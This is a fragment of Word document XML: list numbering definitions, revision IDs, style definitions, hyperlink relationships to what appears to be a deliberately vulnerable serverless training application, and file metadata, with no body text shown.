    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="953EF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C544DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6DA46"/>
    <w:lvl w:ilvl="0" w:tplc="E5CA34DA">
      <w:start w:val="7"/>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2A463F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFE5424"/>
    <w:lvl w:ilvl="0" w:tplc="4ED47D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="4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F22AFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68C4C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1947B7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="859E7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B7353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE86CD8"/>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213267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6F61438"/>
    <w:lvl w:ilvl="0" w:tplc="5386C422">
      <w:start w:val="3"/>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D947D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EC3F0"/>
    <w:lvl w:ilvl="0" w:tplc="83248F16">
      <w:start w:val="6"/>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DEE67A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="165889A8"/>
    <w:lvl w:ilvl="0" w:tplc="C86E9D9C">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimalZero"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="50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102762">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379283219">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="462114230">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1307512281">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="475538599">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="780494637">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139763358">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="149761307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1891768054">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="553077378">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314800575">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="314725528">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1501969872">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="362636438">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1661739579">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="254559543">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2048139230">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="763914756">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1764063097">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="394399463">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="330572823">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="8863791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04"/>
    <w:rsid w:val="0009190F"/>
    <w:rsid w:val="000A57D4"/>
    <w:rsid w:val="00142AD2"/>
    <w:rsid w:val="00304AC5"/>
    <w:rsid w:val="003310D0"/>
    <w:rsid w:val="0035209E"/>
    <w:rsid w:val="0036076B"/>
    <w:rsid w:val="00391D98"/>
    <w:rsid w:val="003D19A8"/>
    <w:rsid w:val="00466562"/>
    <w:rsid w:val="004B3BCB"/>
    <w:rsid w:val="004C4641"/>
    <w:rsid w:val="004E3DD4"/>
    <w:rsid w:val="0059634F"/>
    <w:rsid w:val="005A2E5A"/>
    <w:rsid w:val="005C76E2"/>
    <w:rsid w:val="005F2D61"/>
    <w:rsid w:val="006036CD"/>
    <w:rsid w:val="006B06FE"/>
    <w:rsid w:val="006E5FEA"/>
    <w:rsid w:val="006F7A58"/>
    <w:rsid w:val="007322BC"/>
    <w:rsid w:val="007533DF"/>
    <w:rsid w:val="0078696F"/>
    <w:rsid w:val="007A6D07"/>
    <w:rsid w:val="007D196F"/>
    <w:rsid w:val="007F1665"/>
    <w:rsid w:val="008212BE"/>
    <w:rsid w:val="00843D58"/>
    <w:rsid w:val="00854E15"/>
    <w:rsid w:val="008D3221"/>
    <w:rsid w:val="008F1699"/>
    <w:rsid w:val="009538B4"/>
    <w:rsid w:val="00956299"/>
    <w:rsid w:val="009A083D"/>
    <w:rsid w:val="00A24406"/>
    <w:rsid w:val="00AE58D0"/>
    <w:rsid w:val="00B81965"/>
    <w:rsid w:val="00BA6562"/>
    <w:rsid w:val="00BA72A1"/>
    <w:rsid w:val="00BE1E89"/>
    <w:rsid w:val="00C06B04"/>
    <w:rsid w:val="00C07DD1"/>
    <w:rsid w:val="00C34DD1"/>
    <w:rsid w:val="00C42F17"/>
    <w:rsid w:val="00CF3286"/>
    <w:rsid w:val="00D4477C"/>
    <w:rsid w:val="00D4656F"/>
    <w:rsid w:val="00D84B64"/>
    <w:rsid w:val="00D85FC2"/>
    <w:rsid w:val="00E933FA"/>
    <w:rsid w:val="00EA7EB1"/>
    <w:rsid w:val="00EB1412"/>
    <w:rsid w:val="00EF120F"/>
    <w:rsid w:val="00F24FB8"/>
    <w:rsid w:val="00F33B81"/>
    <w:rsid w:val="00F42FDC"/>
    <w:rsid w:val="00F74D88"/>
    <w:rsid w:val="00F9724F"/>
    <w:rsid w:val="00FA495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08070"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD19FAC-6F11-419D-8EFE-DB2F017B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B04"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B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B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B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B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B04"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B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B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A6D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B6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h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/orders" TargetMode="Externa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948</Words>
  <Characters>5248</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>749</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REDHA ABDULAZIZ ALTURAIK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>REDHA ABDULAZIZ ALTURAIK</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T07:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>